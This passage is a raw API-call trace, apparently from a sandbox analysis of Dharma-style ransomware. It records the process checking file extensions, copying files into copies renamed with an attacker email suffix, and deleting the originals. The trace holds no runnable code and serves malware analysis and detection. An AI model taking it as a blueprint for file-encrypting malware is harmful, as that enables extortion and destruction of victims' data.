maker\\shared\\dvdstyles\\memories\\btn-back-static.png")) returned 0x20 [0050.703] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.703] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.703] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.704] lstrlenW (lpString=".doc") returned 4 [0050.704] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.704] lstrlenW (lpString=".docx") returned 5 [0050.704] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0050.704] lstrlenW (lpString=".pdf") returned 4 [0050.704] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.704] lstrlenW (lpString=".xls") returned 4 [0050.704] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.704] lstrlenW (lpString=".xlsx") returned 5 [0050.704] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0050.704] lstrlenW (lpString=".ppt") returned 4 [0050.704] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.704] lstrlenW (lpString=".zip") returned 4 [0050.704] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.704] lstrlenW (lpString=".rar") returned 4 [0050.704] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.704] lstrlenW (lpString=".bz2") returned 4 [0050.704] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.704] lstrlenW (lpString=".7z") returned 3 [0050.704] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.704] lstrlenW (lpString=".dbf") returned 4 [0050.704] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.704] lstrlenW (lpString=".1cd") returned 4 [0050.704] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.704] lstrlenW (lpString=".jpg") returned 4 [0050.704] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.704] lstrlenW (lpString=".doc") returned 4 [0050.704] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.705] lstrlenW (lpString=".docx") returned 5 [0050.705] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0050.705] lstrlenW (lpString=".pdf") returned 4 [0050.705] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.705] lstrlenW (lpString=".xls") returned 4 [0050.705] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.705] lstrlenW (lpString=".xlsx") returned 5 [0050.705] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0050.705] lstrlenW (lpString=".ppt") returned 4 [0050.705] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.705] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.705] lstrlenW (lpString=".zip") returned 4 [0050.705] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.705] lstrlenW (lpString=".rar") returned 4 [0050.705] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.705] lstrlenW (lpString=".bz2") returned 4 [0050.705] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.705] lstrlenW (lpString=".7z") returned 3 [0050.705] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.705] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.705] lstrlenW (lpString=".dbf") returned 4 [0050.705] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.705] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.705] lstrlenW (lpString=".1cd") returned 4 [0050.705] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.705] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned 72 [0050.705] lstrlenW (lpString=".jpg") returned 4 [0050.705] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.705] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0050.705] lstrlenW (lpString="scrapbook.png") returned 13 [0050.706] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0050.706] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=20346) returned 1 [0050.706] CloseHandle (hObject=0x1a0) returned 1 [0050.706] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png")) returned 0x20 [0050.706] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0050.706] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.706] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 66 [0050.706] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 66 [0050.706] lstrlenW (lpString=".doc") returned 4 [0050.706] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.706] lstrlenW (lpString=".docx") returned 5 [0050.706] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0050.706] lstrlenW (lpString=".pdf") returned 4 [0050.706] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.706] lstrlenW (lpString=".xls") returned 4 [0050.706] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.706] lstrlenW (lpString=".xlsx") returned 5 [0050.706] lstrcmpiW (lpString1=".xlsx", lpString2="k.png") returned -1 [0050.706] lstrlenW (lpString=".ppt") returned 4 [0050.706] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.706] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 66 [0050.706] lstrlenW (lpString=".zip") returned 4 [0050.706] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.707] lstrlenW (lpString=".rar") returned 4 [0050.707] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.707] lstrlenW (lpString=".bz2") returned 4 [0050.707] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.707] lstrlenW (lpString=".7z") returned 3 [0050.707] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.707] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 66 [0050.707] lstrlenW (lpString=".dbf") returned 4 [0050.707] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.707] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 66 [0050.707] lstrlenW (lpString=".1cd") returned 4 [0050.707] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.707] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png") returned 66 [0050.707] lstrlenW (lpString=".jpg") returned 4 [0050.707] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0052.083] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.083] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0052.084] GetLastError () returned 0x0 [0052.084] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x4360, lpOverlapped=0x0) returned 1 [0052.118] WriteFile (in: hFile=0x200, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x4370, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x4370, lpOverlapped=0x0) returned 1 [0052.119] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.119] WriteFile (in: hFile=0x200, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe4, lpOverlapped=0x0) returned 1 [0052.120] SetEndOfFile (hFile=0x200) returned 1 [0052.120] CloseHandle (hObject=0x200) returned 1 [0052.120] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.120] SetEndOfFile (hFile=0x178) returned 1 [0052.121] CloseHandle (hObject=0x178) returned 1 [0052.121] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.121] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl")) returned 1 [0052.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.481] lstrlenW (lpString=".doc") returned 4 [0052.481] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.481] lstrlenW (lpString=".docx") returned 5 [0052.481] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.481] lstrlenW (lpString=".pdf") returned 4 [0052.481] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.481] lstrlenW (lpString=".xls") returned 4 [0052.481] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.481] lstrlenW (lpString=".xlsx") returned 5 [0052.481] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.481] lstrlenW (lpString=".ppt") returned 4 [0052.481] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.481] lstrlenW (lpString=".zip") returned 4 [0052.481] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.481] lstrlenW (lpString=".rar") returned 4 [0052.481] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.481] lstrlenW (lpString=".bz2") returned 4 [0052.481] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.481] lstrlenW (lpString=".7z") returned 3 [0052.482] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.482] lstrlenW (lpString=".dbf") returned 4 [0052.482] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.482] lstrlenW (lpString=".1cd") returned 4 [0052.482] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.482] lstrlenW (lpString=".jpg") returned 4 [0052.482] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.645] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.645] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.646] GetLastError () returned 0x0 [0052.646] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x745e, lpOverlapped=0x0) returned 1 [0052.648] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x7460, lpOverlapped=0x0) returned 1 [0052.651] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.651] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe8, lpOverlapped=0x0) returned 1 [0052.651] SetEndOfFile (hFile=0x204) returned 1 [0052.651] CloseHandle (hObject=0x204) returned 1 [0052.651] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.651] SetEndOfFile (hFile=0x1a0) returned 1 [0052.652] CloseHandle (hObject=0x1a0) returned 1 [0052.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.652] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl")) returned 1 [0052.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.653] lstrlenW (lpString=".doc") returned 4 [0052.653] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.653] lstrlenW (lpString=".docx") returned 5 [0052.653] lstrcmpiW (lpString1=".docx", lpString2="e.xsl") returned -1 [0052.653] lstrlenW (lpString=".pdf") returned 4 [0052.653] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.653] lstrlenW (lpString=".xls") returned 4 [0052.653] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.653] lstrlenW (lpString=".xlsx") returned 5 [0052.653] lstrcmpiW (lpString1=".xlsx", lpString2="e.xsl") returned -1 [0052.653] lstrlenW (lpString=".ppt") returned 4 [0052.653] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.653] lstrlenW (lpString=".zip") returned 4 [0052.653] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.653] lstrlenW (lpString=".rar") returned 4 [0052.653] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.653] lstrlenW (lpString=".bz2") returned 4 [0052.653] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.653] lstrlenW (lpString=".7z") returned 3 [0052.653] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.653] lstrlenW (lpString=".dbf") returned 4 [0052.653] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.653] lstrlenW (lpString=".1cd") returned 4 [0052.653] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0052.653] lstrlenW (lpString=".jpg") returned 4 [0052.654] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.655] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.655] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.656] GetLastError () returned 0x0 [0052.656] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x2340, lpOverlapped=0x0) returned 1 [0052.660] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x2350, lpOverlapped=0x0) returned 1 [0052.661] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.661] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.661] SetEndOfFile (hFile=0x204) returned 1 [0052.661] CloseHandle (hObject=0x204) returned 1 [0052.661] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.661] SetEndOfFile (hFile=0x1a0) returned 1 [0052.662] CloseHandle (hObject=0x1a0) returned 1 [0052.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0052.663] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00004_.gif")) returned 1 [0052.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.663] lstrlenW (lpString=".doc") returned 4 [0052.663] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.663] lstrlenW (lpString=".docx") returned 5 [0052.663] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.663] lstrlenW (lpString=".pdf") returned 4 [0052.663] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.663] lstrlenW (lpString=".xls") returned 4 [0052.663] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.663] lstrlenW (lpString=".xlsx") returned 5 [0052.663] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.664] lstrlenW (lpString=".ppt") returned 4 [0052.664] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.664] lstrlenW (lpString=".zip") returned 4 [0052.664] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.664] lstrlenW (lpString=".rar") returned 4 [0052.664] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.664] lstrlenW (lpString=".bz2") returned 4 [0052.664] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.664] lstrlenW (lpString=".7z") returned 3 [0052.664] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.664] lstrlenW (lpString=".dbf") returned 4 [0052.664] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.664] lstrlenW (lpString=".1cd") returned 4 [0052.664] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 63 [0052.664] lstrlenW (lpString=".jpg") returned 4 [0052.664] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.664] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=7216) returned 1 [0052.664] CloseHandle (hObject=0x1a0) returned 1 [0052.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 0x20 [0052.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.665] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.665] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0052.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.665] GetLastError () returned 0x0 [0052.666] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1c30, lpOverlapped=0x0) returned 1 [0052.668] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1c40, lpOverlapped=0x0) returned 1 [0052.669] ReadFile (in: hFile=0x1a0, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0052.669] WriteFile (in: hFile=0x204, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, 